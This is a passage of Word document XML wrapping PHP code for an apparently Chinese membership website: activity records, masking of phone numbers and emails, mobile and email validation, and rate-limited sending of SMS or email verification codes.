    <w:p w14:paraId="2DB35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379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3C111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0C90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flags($id,$name='title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4536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5C397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flags')-&gt;where(['id'=&gt;$id])-&gt;cache(_cache('db'))-&gt;value($name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E13B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2B35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0457B0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284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AFD5E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50E6D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Groups($jingyan=0,$name='title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25869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groups')-&gt;where('jingyan','elt',$jingyan)-&gt;order('id desc')-&gt;cache(_cache('db'))-&gt;value($name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C4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db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38F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7122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records($uid='',$text='',$money='',$type='',$data=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFD9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 &amp;&amp; !$text){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEF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0B4BA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4D0F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uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D6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ext']=$text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD95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money;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06D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type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F910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ata']=$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B065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time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB38A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p']=_ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDAC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stem']=$_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA8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records')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578492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14075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8B23C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id='',$name='',$fuhao='****'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CCB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return '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F9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gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470E4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09FC96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3A1D8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A46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nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301C4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nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CB1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user']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D4B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user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F4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obile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072916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uhao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3E1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substr($data['mobile'],0,3).$fuhao.substr($data['mobile'],7,4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E673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9E3B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mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E4A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1FF4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email']){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D069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uhao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE45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explode('@',$data['email']);            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E82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 = substr($data['email'],0,2).$fuhao.$email[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF4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186C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email'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A97D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73D8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A42F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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'._userName_id($data['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358B1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359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qianming']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296957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qianming']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这家伙好懒，什么都不留下！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4941D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F3FC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img']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7139B3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 '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE2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CE34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_imgUrl().$data['img']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2709A9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02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yaoqing=Db::name('yaoqing')-&gt;where(['uid'=&gt;$data['id']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58388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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1BF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Db::name('yaoqing')-&gt;insert(['uid'=&gt;$data['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF606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6D5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yaoqing']=$yaoqing;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5577FA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fz'] = Db::name('member_sfz')-&gt;where(['uid'=&gt;$data['id']])-&gt;value('hide');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D9C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1CD752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name];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D2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1B73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2DBC2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642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AFB1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Name_id($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE15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base_convert($id, 9, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655177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15E0A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Data($data,$field='nickname',$fuhao='****'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC59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 return '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF6F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nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F565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nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6F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user']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF2A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user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B567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obile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204EAA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uhao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501E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substr($data['mobile'],0,3).$fuhao.substr($data['mobile'],7,4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358DF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1E543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mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734EB4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649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email']){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BD4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uhao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028DB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explode('@',$data['email']);            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D23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 = substr($data['email'],0,2).$fuhao.$email[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A34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AA59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email'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE1BD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1EFB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79BE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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$data['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F28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694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qianming']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FCE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qianming']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这家伙好懒，什么都不留下！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFE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1AA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img']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2496B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public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451FA8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99F2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eld){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F023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field];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BD7D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8EB4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username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BFB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F922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CBEF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name($data,$fuhao='****'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142D07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nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8BE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username']=$data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788DF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obile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78931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uhao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBD2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substr($data['mobile'],0,3).$fuhao.substr($data['mobile'],7,4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D104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40AAF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data['mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7905D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E742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FCA6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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$data['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18848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B88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username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564052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CB9C9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Img($img='',$w='',$h=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E77F6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5B3F5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ublic/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787F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A69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img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CED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0413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8783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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>检测是否手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DD5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sMobile($mobile=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BD5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14CD9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5E35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trlen($mobile)!=11){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D86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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F60FB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9AD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2CD51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numeric($mobile)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C9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7E59B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C68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reg_match('#^13[\d]{9}$|^14[5,7]{1}\d{8}$|^15[^4]{1}\d{8}$|^17[0,6,7,8]{1}\d{8}$|^18[\d]{9}$#', $mobile) ? true : false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25734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1EBB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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>检测是否邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A058B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sEmail($email=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C8D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b_strlen($email)&lt;5){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321242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017BB1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461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a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+@([a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+\.[a-zA-Z]{2,3}$/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F1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reg_match($res,$email)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9189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46443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273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74F43F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47B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F1C6B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code($username='',$content=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704DF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name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929E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号码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580E1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001F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tent){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55987F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验证码第二个参数不可为空，请检查</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_code()</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数第二个参数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567074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435D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email=false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A68CA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isMobile($username)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61391F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username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67878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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5569C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_isEmail($username)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A8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username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2728B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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F6BB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8BFD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号码格式错误，请检查号码是否正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39945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A57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 &amp;&amp; !$email){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65470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号码格式错误，请检查号码是否正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236DA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5A3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480182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p) return 'IP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地区异常或无法获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IP';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF15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s=10;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5173E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Db::name('code')-&gt;where('username',$username)-&gt;whereTime('time', 'd')-&gt;fetchSql(false)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B47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unt &gt; $nus){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3572D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请不要频繁刷验证码，每天最多获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$nus.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个，请明天获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FB9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5AB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773B0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de')-&gt;where('username',$username)-&gt;order('id desc')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E19E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1C9F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turity=$db['time']+$db['maturity'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D247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aturity &gt; $time){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A67E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请不要频繁操作，等待</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.($maturity-$time).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>秒后再获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$name.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F637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EA8E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5D7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rand(100000,999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF64C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ijian=120;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E2D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sername']=$username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAD2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de']=$code;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EEC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time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4163E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aturity']=$shijian;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5D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p']=$ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB16D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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D45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stem']=$_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393AD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tent=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' || $content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D2A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name']='tempReg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B0B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sdkReg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0FCC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content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' || $content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>短信登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45230D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name']='tempLogin';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE4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sdkLogin';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4D2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content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>找回密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FA6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name']='tempPwd';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78706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sdkPwd';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE85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 if($content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' || $content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90C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name']='tempMobile';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06046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sdkMobile';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348B3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7284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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E312A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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28E1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5D7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emp){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32906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type']='sdkTemp';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904D7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Db::name('member_config')-&gt;where($temp)-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC38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2;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAAA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config('config')['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C6D3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str_replace("\${code}",$code,$temp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC7E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nd = new Send;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5845C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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B30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Send-&gt;email(['email'=&gt;$username,'content'=&gt;$temp]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B67A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ult !== true){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5332B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邮箱发送失败，请检查后台邮箱配置是否正确，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C87C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11F33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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05184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8BA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name=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587FB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dkMobile){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A1F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dkMobile</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>比较值不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
